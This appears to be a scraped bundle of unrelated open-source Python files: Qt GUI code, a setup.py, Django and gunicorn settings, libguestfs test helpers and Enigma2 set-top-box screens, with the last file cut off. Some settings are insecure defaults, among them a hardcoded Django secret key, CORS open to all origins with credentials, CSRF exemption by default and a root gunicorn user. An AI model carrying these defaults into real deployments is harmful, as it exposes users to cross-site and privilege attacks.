model = NetworkModel(None, app, network_service)
txhistory = cls(parent, view, model)
model.setParent(txhistory)
return txhistory
def refresh_nodes_manually(self):
self.model.refresh_nodes_once()
def node_context_menu(self, point):
index = self.view.table_network.indexAt(point)
valid, node = self.model.table_model_data(index)
if self.model.app.parameters.expert_mode:
menu = QMenu()
open_in_browser = QAction(self.tr("Open in browser"), self)
open_in_browser.triggered.connect(self.open_node_in_browser)
open_in_browser.setData(node)
menu.addAction(open_in_browser)
# Show the context menu.
menu.exec_(QCursor.pos())
@pyqtSlot()
def set_root_node(self):
node = self.sender().data()
self.model.add_root_node(node)
@pyqtSlot()
def unset_root_node(self):
node = self.sender().data()
self.model.unset_root_node(node)
@pyqtSlot()
def open_node_in_browser(self):
node = self.sender().data()
bma_endpoints = [e for e in node.endpoints if isinstance(e, BMAEndpoint)]
if bma_endpoints:
conn_handler = next(bma_endpoints[0].conn_handler())
peering_url = bma.API(conn_handler, bma.network.URL_PATH).reverse_url(conn_handler.http_scheme, '/peering')
url = QUrl(peering_url)
QDesktopServices.openUrl(url)
| ucoin-io/cutecoin | src/sakia/gui/navigation/network/controller.py | Python | mit | 2,750 |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='Unirest',
version='1.1.7',
author='Mashape',
author_email='[email protected]',
packages=['unirest'],
url='https://github.com/Mashape/unirest-python',
license='LICENSE',
description='Simplified, lightweight HTTP client library',
install_requires=[
"poster >= 0.8.1"
]
)
| abhishekgahlot/unirest-python | setup.py | Python | mit | 431 |
# encoding: utf-8
# Copyright 2011 Tree.io Limited
# This file is part of Treeio.
# License www.tree.io/license
#-*- coding: utf-8 -*-
import sys
import utils
sys.modules['piston.utils'] = utils
from piston.resource import Resource
class CsrfExemptResource(Resource):
"""A Custom Resource that is csrf exempt"""
def __init__(self, handler, authentication=None):
super(CsrfExemptResource, self).__init__(handler, authentication)
self.csrf_exempt = getattr(self.handler, 'csrf_exempt', True)
def __call__(self, request, *args, **kwargs):
res = super(CsrfExemptResource, self).__call__(
request, *args, **kwargs)
if hasattr(self.handler, 'status'):
res.status_code = self.handler.status
del self.handler.status
return res
| nuwainfo/treeio | core/api/resource.py | Python | mit | 815 |
#
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
"""
Django settings for pdc project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3hm)=^*sowhxr%m)%_u3mk+!ncy=c)147xbevej%l_lcdogu#+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
ITEMS_PER_PAGE = 50
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'corsheaders',
'pdc.apps.auth',
'pdc.apps.common',
'pdc.apps.compose',
'pdc.apps.package',
'pdc.apps.release',
'pdc.apps.repository',
'pdc.apps.contact',
'pdc.apps.component',
'pdc.apps.changeset',
'pdc.apps.utils',
'pdc.apps.bindings',
'pdc.apps.usage',
'pdc.apps.osbs',
'mptt',
)
AUTH_USER_MODEL = 'kerb_auth.User'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'pdc.apps.auth.authentication.TokenAuthenticationWithChangeSet',
'rest_framework.authentication.SessionAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissions'
],
'DEFAULT_METADATA_CLASS': 'contrib.bulk_operations.metadata.BulkMetadata',
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'pdc.apps.common.renderers.ReadOnlyBrowsableAPIRenderer',
),
'EXCEPTION_HANDLER': 'pdc.apps.common.handlers.exception_handler',
'DEFAULT_PAGINATION_CLASS': 'pdc.apps.common.pagination.AutoDetectedPageNumberPagination',
'NON_FIELD_ERRORS_KEY': 'detail',
}
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'pdc.apps.auth.middleware.RemoteUserMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'kobo.django.menu.middleware.MenuMiddleware',
'pdc.apps.usage.middleware.UsageMiddleware',
'pdc.apps.changeset.middleware.ChangesetMiddleware',
'pdc.apps.utils.middleware.MessagingMiddleware',
)
AUTHENTICATION_BACKENDS = (
'pdc.apps.auth.backends.KerberosUserBackend',
#'pdc.apps.auth.backends.AuthMellonUserBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/auth/krb5login'
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'pdc.urls'
import kobo
ROOT_MENUCONF = "pdc.menu"
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, "pdc/templates"),
os.path.join(os.path.dirname(kobo.__file__), "hub", "templates"),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'kobo.django.menu.context_processors.menu_context_processor',
],
},
},
]
WSGI_APPLICATION = 'pdc.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = '/usr/share/pdc/static'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "pdc/static"),
"/usr/share/patternfly1/resources",
)
REST_API_URL = 'rest_api/'
REST_API_VERSION = 'v1'
REST_API_PAGE_SIZE = 20
REST_API_PAGE_SIZE_QUERY_PARAM = 'page_size'
REST_API_MAX_PAGE_SIZE = 100
API_HELP_TEMPLATE = "api/help.html"
DIST_GIT_WEB_ROOT_URL = "http://pkgs.example.com/cgit/"
DIST_GIT_RPM_PATH = 'rpms/'
DIST_GIT_REPO_FORMAT = DIST_GIT_WEB_ROOT_URL + DIST_GIT_RPM_PATH + "%s"
DIST_GIT_BRANCH_FORMAT = "?h=%s"
# ldap settings
LDAP_URI = "ldap://ldap.example.com:389"
LDAP_USERS_DN = "ou=users,dc=example,dc=com"
LDAP_GROUPS_DN = "ou=groups,dc=example,dc=com"
LDAP_CACHE_HOURS = 24
#
# CORS settings
#
# The requests can come from any origin (hostname). If this is undesirable, use
# settings_local.py module, set this to False and either set
# CORS_ORIGIN_WHITELIST to a tuple of hostnames that are allowed to contact the
# API, or set CORS_ORIGIN_REGEX_WHITELIST, which again is a tuple of regular
# expressions.
CORS_ORIGIN_ALLOW_ALL = True
# Only the REST API can be accessed. If settings local override REST_API_URL,
# make sure to update this setting as well.
CORS_URLS_REGEX = '^/%s.*$' % REST_API_URL
# We want HTML/JS clients to be able to use Kerberos authentication.
CORS_ALLOW_CREDENTIALS = True
# Allow default headers from django-cors-headers package as well as
# PDC-Change-Comment custom header.
CORS_ALLOW_HEADERS = (
'x-requested-with',
'content-type',
'accept',
'origin',
'authorization',
'x-csrftoken',
'pdc-change-comment',
)
# mock kerberos login for debugging
DEBUG_USER = None
BROWSABLE_DOCUMENT_MACROS = {
# need to be rewrite with the real host name when deploy.
'HOST_NAME': 'http://localhost:8000',
# make consistent with rest api root.
'API_PATH': '%s%s' % (REST_API_URL, REST_API_VERSION),
}
EMPTY_PATCH_ERROR_RESPONSE = {
'detail': 'Partial update with no changes does not make much sense.',
'hint': ' '.join(['Please make sure the URL includes the trailing slash.',
'Some software may automatically redirect you the the',
'correct URL but not forward the request body.'])
}
INTERNAL_SERVER_ERROR_RESPONSE = {
'detail': 'The server encountered an internal error or misconfiguration and was unable to complete your request.'
}
# Messaging Bus Config
MESSAGE_BUS = {
# MLP: Messaging Library Package
# e.g. `fedmsg` for fedmsg or `kombu` for AMQP and other transports that `kombu` supports.
# `stomp` for STOMP supports.
'MLP': '',
# # `fedmsg` config example:
# # fedmsg's config is managed by `fedmsg` package, so normally here just need to set the
# # 'MLP' to 'fedmsg'
# 'MLP': 'fedmsg',
#
# # `kombu` config example:
# 'MLP': 'kombu',
# 'URL': 'amqp://guest:[email protected]:5672//',
# 'EXCHANGE': {
# 'name': 'pdc',
# 'type': 'topic',
# 'durable': False
# },
# 'OPTIONS': {
# # Set these two items to config `kombu` to use ssl.
# 'login_method': 'EXTERNAL',
# 'ssl': {
# 'ca_certs': '',
# 'keyfile': '',
# 'certfile': '',
# 'cert_reqs': ssl.CERT_REQUIRED,
# }
# }
#
# # `stomp` config items:
# 'MLP': 'stomp',
# 'HOST_AND_PORTS': [
# ('stomp.example1.com', 61613),
# ('stomp.example2.com', 61613),
# ('stomp.example3.com', 61613),
# ],
# 'TOPIC': 'pdc',
# 'CERT_FILE': '',
# 'KEY_FILE': '',
}
# ======== Email configuration =========
# Email addresses who would like to receive email
ADMINS = (('PDC Dev', '[email protected]'),)
# Email SMTP HOST configuration
EMAIL_HOST = 'smtp.example.com'
# Email sender's address
SERVER_EMAIL = '[email protected]'
EMAIL_SUBJECT_PREFIX = '[PDC]'
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(asctime)s %(process)d [%(filename)s -- %(module)s.%(funcName)s:%(lineno)d] [%(levelname)s]- %(message)s'
},
},
'handlers': {
'stderr': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': sys.stderr
},
'stdout': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
'stream': sys.stdout
},
'watchedfile': {
'level': 'INFO',
'class': 'logging.handlers.WatchedFileHandler',
'formatter': 'verbose',
'filename': '/var/log/pdc/server.log',
'delay': True,
},
# Send a warning email if we want it.
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
}
},
'loggers': {
'pdc': {
'handlers': ['stderr'],
'level': 'INFO',
},
'django.request': {
'handlers': ['stderr'],
'level': 'ERROR',
'propagate': False,
}
}
}
# Attempts to import server specific settings.
# Note that all server specific settings should go to 'settings_local.py'
try:
from settings_local import * # noqa
except ImportError:
pass
if 'pdc.apps.bindings' in INSTALLED_APPS:
WITH_BINDINGS = True
else:
WITH_BINDINGS = False
| xychu/product-definition-center | pdc/settings.py | Python | mit | 10,354 |
#coding:utf-8
bind = 'unix:/var/run/gunicorn.sock'
workers = 4
# you should change this
user = 'root'
# maybe you like error
loglevel = 'debug'
errorlog = '-'
logfile = '/var/log/gunicorn/debug.log'
timeout = 300
secure_scheme_headers = {
'X-SCHEME': 'https',
}
x_forwarded_for_header = 'X-FORWARDED-FOR'
| chenke91/ckPermission | settings.py | Python | mit | 313 |
# from . import *
| benjaminjack/pinetree | tests/models/__init__.py | Python | mit | 18 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.paging import Paged
class USqlViewPaged(Paged):
"""
A paging container for iterating over a list of USqlView object
"""
_attribute_map = {
'next_link': {'key': 'nextLink', 'type': 'str'},
'current_page': {'key': 'value', 'type': '[USqlView]'}
}
def __init__(self, *args, **kwargs):
super(USqlViewPaged, self).__init__(*args, **kwargs)
| SUSE/azure-sdk-for-python | azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_view_paged.py | Python | mit | 874 |
"""
libguestfs tools test utility functions.
"""
import logging
from autotest.client import os_dep, utils
from autotest.client.shared import error
import propcan
class LibguestfsCmdError(Exception):
"""
Error of libguestfs-tool command.
"""
def __init__(self, details=''):
self.details = details
Exception.__init__(self)
def __str__(self):
return str(self.details)
def lgf_cmd_check(cmd):
"""
To check whether the cmd is supported on this host.
@param cmd: the cmd to use a libguest tool.
@return: None if the cmd is not exist, otherwise return its path.
"""
libguestfs_cmds = ['libguestfs_test_tool', 'guestfish', 'guestmount',
'virt-alignment-scan', 'virt-cat', 'virt-copy-in',
'virt-copy-out', 'virt-df', 'virt-edit',
'virt-filesystems', 'virt-format', 'virt-inspector',
'virt-list-filesystems', 'virt-list-partitions',
'virt-ls', 'virt-make-fs', 'virt-rescue',
'virt-resize', 'virt-sparsify', 'virt-sysprep',
'virt-tar', 'virt-tar-in', 'virt-tar-out',
'virt-win-reg']
if not (cmd in libguestfs_cmds):
raise LibguestfsCmdError("Command %s is not supported by libguestfs yet." % cmd)
try:
return os_dep.command(cmd)
except ValueError:
logging.warning("You have not installed %s on this host.", cmd)
return None
def lgf_command(cmd, **dargs):
"""
Interface of libguestfs tools' commands.
@param cmd: Command line to execute.
@param dargs: standardized command keywords.
@return: CmdResult object.
@raise: LibguestfsCmdError if non-zero exit status
and ignore_status=False
"""
ignore_status = dargs.get('ignore_status', True)
debug = dargs.get('debug', False)
timeout = dargs.get('timeout', 60)
if debug:
logging.debug("Running command %s in debug mode.", cmd)
# Raise exception if ignore_status == False
try:
ret = utils.run(cmd, ignore_status=ignore_status,
verbose=debug, timeout=timeout)
except error.CmdError, detail:
raise LibguestfsCmdError(detail)
if debug:
logging.debug("status: %s", ret.exit_status)
logging.debug("stdout: %s", ret.stdout.strip())
logging.debug("stderr: %s", ret.stderr.strip())
# Return CmdResult instance when ignore_status is True
return ret
class LibguestfsBase(propcan.PropCanBase):
"""
Base class of libguestfs tools.
"""
__slots__ = ('ignore_status', 'debug', 'timeout')
def __init__(self, *args, **dargs):
init_dict = dict(*args, **dargs)
init_dict['ignore_status'] = init_dict.get('ignore_status', True)
init_dict['debug'] = init_dict.get('debug', False)
init_dict['timeout'] = init_dict.get('timeout', 60)
super(LibguestfsBase, self).__init__(init_dict)
def set_ignore_status(self, ignore_status):
"""
Enforce setting ignore_status as a boolean.
"""
if bool(ignore_status):
self.dict_set('ignore_status', True)
else:
self.dict_set('ignore_status', False)
def set_debug(self, debug):
"""
Accessor method for 'debug' property that logs message on change
"""
if not self.INITIALIZED:
self.dict_set('debug', debug)
else:
current_setting = self.dict_get('debug')
desired_setting = bool(debug)
if not current_setting and desired_setting:
self.dict_set('debug', True)
logging.debug("Libguestfs debugging enabled")
# current and desired could both be True
if current_setting and not desired_setting:
self.dict_set('debug', False)
logging.debug("Libguestfs debugging disabled")
def libguest_test_tool_cmd(qemuarg=None, qemudirarg=None,
timeoutarg=None, **dargs):
"""
Execute libguest-test-tool command.
@param qemuarg: the qemu option
@param qemudirarg: the qemudir option
@param timeoutarg: the timeout option
@return: a CmdResult object
@raise: raise LibguestfsCmdError
"""
cmd = "libguest-test-tool"
if qemuarg is not None:
cmd += " --qemu '%s'" % qemuarg
if qemudirarg is not None:
cmd += " --qemudir '%s'" % qemudirarg
if timeoutarg is not None:
cmd += " --timeout %s" % timeoutarg
# Allow to raise LibguestfsCmdError if ignore_status is False.
return lgf_command(cmd, **dargs)
def virt_edit_cmd(disk_or_domain, file_path, options=None,
extra=None, expr=None, **dargs):
"""
Execute virt-edit command to check whether it is ok.
Since virt-edit will need uses' interact, maintain and return
a session if there is no raise after command has been executed.
@param disk_or_domain: a img path or a domain name.
@param file_path: the file need to be edited in img file.
@param options: the options of virt-edit.
@param extra: additional suffix of command.
@return: a session of executing virt-edit command.
"""
# disk_or_domain and file_path are necessary parameters.
cmd = "virt-edit '%s' '%s'" % (disk_or_domain, file_path)
if options is not None:
cmd += " %s" % options
if extra is not None:
cmd += " %s" % extra
if expr is not None:
cmd += " -e '%s'" % expr
return lgf_command(cmd, **dargs)
| rbbratta/virt-test | virttest/utils_libguestfs.py | Python | gpl-2.0 | 5,627 |
from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen, ConfigList
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.config import config, ConfigSubsection, ConfigBoolean, getConfigListEntry, ConfigSelection, ConfigYesNo, ConfigIP
from Components.Network import iNetwork
from Components.Ipkg import IpkgComponent
from enigma import eDVBDB
config.misc.installwizard = ConfigSubsection()
config.misc.installwizard.hasnetwork = ConfigBoolean(default = False)
config.misc.installwizard.ipkgloaded = ConfigBoolean(default = False)
config.misc.installwizard.channellistdownloaded = ConfigBoolean(default = False)
class InstallWizard(Screen, ConfigListScreen):
STATE_UPDATE = 0
STATE_CHOISE_CHANNELLIST = 1
STATE_CHOISE_SOFTCAM = 2
def __init__(self, session, args = None):
Screen.__init__(self, session)
self.index = args
self.list = []
ConfigListScreen.__init__(self, self.list)
if self.index == self.STATE_UPDATE:
config.misc.installwizard.hasnetwork.value = False
config.misc.installwizard.ipkgloaded.value = False
modes = {0: " "}
self.enabled = ConfigSelection(choices = modes, default = 0)
self.adapters = [(iNetwork.getFriendlyAdapterName(x),x) for x in iNetwork.getAdapterList()]
is_found = False
for x in self.adapters:
if x[1] == 'eth0' or x[1] == 'eth1':
if iNetwork.getAdapterAttribute(x[1], 'up'):
self.ipConfigEntry = ConfigIP(default = iNetwork.getAdapterAttribute(x[1], "ip"))
iNetwork.checkNetworkState(self.checkNetworkCB)
if_found = True
else:
iNetwork.restartNetwork(self.checkNetworkLinkCB)
break
if is_found is False:
self.createMenu()
elif self.index == self.STATE_CHOISE_CHANNELLIST:
self.enabled = ConfigYesNo(default = True)
modes = {"openxta": "XTA(13e-19e)", "19e": "Astra 1", "23e": "Astra 3", "19e-23e": "Astra 1 Astra 3", "19e-23e-28e": "Astra 1 Astra 2 Astra 3", "13e-19e-23e-28e": "Astra 1 Astra 2 Astra 3 Hotbird"}
self.channellist_type = ConfigSelection(choices = modes, default = "openxta")
self.createMenu()
elif self.index == self.STATE_CHOISE_SOFTCAM:
self.enabled = ConfigYesNo(default = True)
modes = {"cccam": _("default") + " (CCcam)", "scam": "scam"}
self.softcam_type = ConfigSelection(choices = modes, default = "cccam")
self.createMenu()
def checkNetworkCB(self, data):
if data < 3:
config.misc.installwizard.hasnetwork.value = True
self.createMenu()
def checkNetworkLinkCB(self, retval):
if retval:
iNetwork.checkNetworkState(self.checkNetworkCB)
else:
self.createMenu()
def createMenu(self):
try:
test = self.index
except:
return
self.list = []
if self.index == self.STATE_UPDATE:
if config.misc.installwizard.hasnetwork.value:
self.list.append(getConfigListEntry(_("Your internet connection is working (ip: %s)") % (self.ipConfigEntry.getText()), self.enabled))
else:
self.list.append(getConfigListEntry(_("Your receiver does not have an internet connection"), self.enabled))
elif self.index == self.STATE_CHOISE_CHANNELLIST:
self.list.append(getConfigListEntry(_("Install channel list"), self.enabled))
if self.enabled.value:
self.list.append(getConfigListEntry(_("Channel list type"), self.channellist_type))
elif self.index == self.STATE_CHOISE_SOFTCAM:
self.list.append(getConfigListEntry(_("Install softcam"), self.enabled))
if self.enabled.value:
self.list.append(getConfigListEntry(_("Softcam type"), self.softcam_type))
self["config"].list = self.list
self["config"].l.setList(self.list)
def keyLeft(self):
if self.index == 0:
return
ConfigListScreen.keyLeft(self)
self.createMenu()
def keyRight(self):
if self.index == 0:
return
ConfigListScreen.keyRight(self)
self.createMenu()
def run(self):
if self.index == self.STATE_UPDATE:
if config.misc.installwizard.hasnetwork.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (updating packages)'), IpkgComponent.CMD_UPDATE)
elif self.index == self.STATE_CHOISE_CHANNELLIST and self.enabled.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (downloading channel list)'), IpkgComponent.CMD_REMOVE, {'package': 'enigma2-plugin-settings-henksat-' + self.channellist_type.value})
elif self.index == self.STATE_CHOISE_SOFTCAM and self.enabled.value:
self.session.open(InstallWizardIpkgUpdater, self.index, _('Please wait (downloading softcam)'), IpkgComponent.CMD_INSTALL, {'package': 'enigma2-plugin-softcams-' + self.softcam_type.value})
return
class InstallWizardIpkgUpdater(Screen):
skin = """
<screen position="c-300,c-25" size="600,50" title=" ">
<widget source="statusbar" render="Label" position="10,5" zPosition="10" size="e-10,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, index, info, cmd, pkg = None):
self.skin = InstallWizardIpkgUpdater.skin
Screen.__init__(self, session)
self["statusbar"] = StaticText(info)
self.pkg = pkg
self.index = index
self.state = 0
self.ipkg = IpkgComponent()
self.ipkg.addCallback(self.ipkgCallback)
if self.index == InstallWizard.STATE_CHOISE_CHANNELLIST:
self.ipkg.startCmd(cmd, {'package': 'enigma2-plugin-settings-*'})
else:
self.ipkg.startCmd(cmd, pkg)
def ipkgCallback(self, event, param):
if event == IpkgComponent.EVENT_DONE:
if self.index == InstallWizard.STATE_UPDATE:
config.misc.installwizard.ipkgloaded.value = True
elif self.index == InstallWizard.STATE_CHOISE_CHANNELLIST:
if self.state == 0:
self.ipkg.startCmd(IpkgComponent.CMD_INSTALL, self.pkg)
self.state = 1
return
else:
config.misc.installwizard.channellistdownloaded.value = True
eDVBDB.getInstance().reloadBouquets()
eDVBDB.getInstance().reloadServicelist()
self.close()
| XTAv2/Enigma2 | lib/python/Screens/InstallWizard.py | Python | gpl-2.0 | 5,974 |
# collect data about max memory usage of processes matching some patterns
import psutil, re, operator, time, sys
sampleTime=.5 # seconds
# matching lines will be taken in account
#cmdPattern='.*cc1plus.*src/([a-zA-Z0-9_-]\.cpp).*'
cmdPattern=r'.*cc1plus.* (\S+/)?([^/ ]+\.cpp).*'
# group in the pattern which identifies the process (e.g. source code file)
cmdKeyGroup=2
maxMem={}
while True:
try:
for p in psutil.process_iter():
m=re.match(cmdPattern,' '.join(p.cmdline))
if not m: continue
key=m.group(cmdKeyGroup)
mem=p.get_memory_info()[1] # tuple of RSS (resident set size) and VMS (virtual memory size)
if key not in maxMem:
print 'New process with key',key
maxMem[key]=mem
elif maxMem[key]<mem: maxMem[key]=mem
time.sleep(sampleTime)
except (KeyboardInterrupt,SystemExit):
# print summary, exit
for k,v in sorted(maxMem.iteritems(),key=operator.itemgetter(1)):
print '{:>10.1f} {}'.format(1e-6*v,k)
sys.exit(0)
| tarthy6/dozer-thesis | scripts/watch-mem-usage.py | Python | gpl-2.0 | 965 |
"""Service layer (domain model) of practice app
"""
| effa/flocs | practice/services/__init__.py | Python | gpl-2.0 | 53 |
from enigma import eListboxPythonMultiContent, gFont, eEnv, getBoxType
from boxbranding import getMachineBrand, getMachineName
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Pixmap import Pixmap
from Components.MenuList import MenuList
from Components.MultiContent import MultiContentEntryText, MultiContentEntryPixmapAlphaTest
from Components.Network import iNetwork
from Components.NimManager import nimmanager
from Components.SystemInfo import SystemInfo
from Screens.Screen import Screen
from Screens.NetworkSetup import *
from Screens.About import About
from Screens.PluginBrowser import PluginDownloadBrowser, PluginFilter, PluginBrowser
from Screens.LanguageSelection import LanguageSelection
from Screens.Satconfig import NimSelection
from Screens.ScanSetup import ScanSimple, ScanSetup
from Screens.Setup import Setup, getSetupTitle
from Screens.HarddiskSetup import HarddiskSelection, HarddiskFsckSelection, HarddiskConvertExt4Selection
from Screens.SkinSelector import LcdSkinSelector
from Screens.VideoMode import VideoSetup
from Plugins.Plugin import PluginDescriptor
from Plugins.SystemPlugins.Satfinder.plugin import Satfinder
from Plugins.SystemPlugins.NetworkBrowser.MountManager import AutoMountManager
from Plugins.SystemPlugins.NetworkBrowser.NetworkBrowser import NetworkBrowser
from Plugins.SystemPlugins.NetworkWizard.NetworkWizard import NetworkWizard
from Plugins.Extensions.ExtrasPanel.RestartNetwork import RestartNetwork
from Plugins.Extensions.ExtrasPanel.MountManager import HddMount
from Plugins.Extensions.ExtrasPanel.SoftcamPanel import *
from Plugins.Extensions.ExtrasPanel.SoftwarePanel import SoftwarePanel
from Plugins.SystemPlugins.SoftwareManager.Flash_online import FlashOnline
from Plugins.SystemPlugins.SoftwareManager.ImageBackup import ImageBackup
from Plugins.SystemPlugins.SoftwareManager.plugin import UpdatePlugin, SoftwareManagerSetup
from Plugins.SystemPlugins.SoftwareManager.BackupRestore import BackupScreen, RestoreScreen, BackupSelection, getBackupPath, getOldBackupPath, getBackupFilename
from Tools.Directories import resolveFilename, SCOPE_PLUGINS, SCOPE_SKIN_IMAGE, SCOPE_SKIN
from Tools.LoadPixmap import LoadPixmap
from os import path, listdir
from time import sleep
from re import search
import NavigationInstance
plugin_path_networkbrowser = eEnv.resolve("${libdir}/enigma2/python/Plugins/SystemPlugins/NetworkBrowser")
if path.exists("/usr/lib/enigma2/python/Plugins/Extensions/AudioSync"):
from Plugins.Extensions.AudioSync.AC3setup import AC3LipSyncSetup
plugin_path_audiosync = eEnv.resolve("${libdir}/enigma2/python/Plugins/Extensions/AudioSync")
AUDIOSYNC = True
else:
AUDIOSYNC = False
if path.exists("/usr/lib/enigma2/python/Plugins/SystemPlugins/VideoEnhancement/plugin.pyo"):
from Plugins.SystemPlugins.VideoEnhancement.plugin import VideoEnhancementSetup
VIDEOENH = True
else:
VIDEOENH = False
if path.exists("/usr/lib/enigma2/python/Plugins/Extensions/dFlash"):
from Plugins.Extensions.dFlash.plugin import dFlash
DFLASH = True
else:
DFLASH = False
if path.exists("/usr/lib/enigma2/python/Plugins/SystemPlugins/PositionerSetup/plugin.pyo"):
from Plugins.SystemPlugins.PositionerSetup.plugin import PositionerSetup, RotorNimSelection
POSSETUP = True
else:
POSSETUP = False
def isFileSystemSupported(filesystem):
try:
for fs in open('/proc/filesystems', 'r'):
if fs.strip().endswith(filesystem):
return True
return False
except Exception, ex:
print "[Harddisk] Failed to read /proc/filesystems:", ex
def Check_Softcam():
found = False
for x in listdir('/etc'):
if x.find('.emu') > -1:
found = True
break;
return found
class QuickMenu(Screen):
skin = """
<screen name="QuickMenu" position="center,center" size="1180,600" backgroundColor="black" flags="wfBorder">
<widget name="list" position="21,32" size="370,400" backgroundColor="black" itemHeight="50" transparent="1" />
<widget name="sublist" position="410,32" size="300,400" backgroundColor="black" itemHeight="50" />
<eLabel position="400,30" size="2,400" backgroundColor="darkgrey" zPosition="3" />
<widget source="session.VideoPicture" render="Pig" position="720,30" size="450,300" backgroundColor="transparent" zPosition="1" />
<widget name="description" position="22,445" size="1150,110" zPosition="1" font="Regular;22" halign="center" backgroundColor="black" transparent="1" />
<widget name="key_red" position="20,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<widget name="key_green" position="325,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<widget name="key_yellow" position="630,571" size="300,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" valign="center" />
<widget name="key_blue" position="935,571" size="234,26" zPosition="1" font="Regular;22" halign="center" foregroundColor="white" backgroundColor="black" transparent="1" />
<eLabel name="new eLabel" position="21,567" size="300,3" zPosition="3" backgroundColor="red" />
<eLabel name="new eLabel" position="325,567" size="300,3" zPosition="3" backgroundColor="green" />
<eLabel name="new eLabel" position="630,567" size="300,3" zPosition="3" backgroundColor="yellow" />
<eLabel name="new eLabel" position="935,567" size="234,3" zPosition="3" backgroundColor="blue" />
</screen> """
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Quick Launch Menu"))
self["key_red"] = Label(_("Exit"))
self["key_green"] = Label(_("System Info"))
self["key_yellow"] = Label(_("Devices"))
self["key_blue"] = Label()
self["description"] = Label()
self.menu = 0
self.list = []
self["list"] = QuickMenuList(self.list)
self.sublist = []
self["sublist"] = QuickMenuSubList(self.sublist)
self.selectedList = []
self.onChangedEntry = []
self["list"].onSelectionChanged.append(self.selectionChanged)
self["sublist"].onSelectionChanged.append(self.selectionSubChanged)
self["actions"] = ActionMap(["SetupActions","WizardActions","MenuActions","MoviePlayerActions"],
{
"ok": self.ok,
"back": self.keyred,
"cancel": self.keyred,
"left": self.goLeft,
"right": self.goRight,
"up": self.goUp,
"down": self.goDown,
}, -1)
self["ColorActions"] = HelpableActionMap(self, "ColorActions",
{
"red": self.keyred,
"green": self.keygreen,
"yellow": self.keyyellow,
})
self.MainQmenu()
self.selectedList = self["list"]
self.selectionChanged()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self["sublist"].selectionEnabled(0)
def selectionChanged(self):
if self.selectedList == self["list"]:
item = self["list"].getCurrent()
if item:
self["description"].setText(_(item[4]))
self.okList()
def selectionSubChanged(self):
if self.selectedList == self["sublist"]:
item = self["sublist"].getCurrent()
if item:
self["description"].setText(_(item[3]))
def goLeft(self):
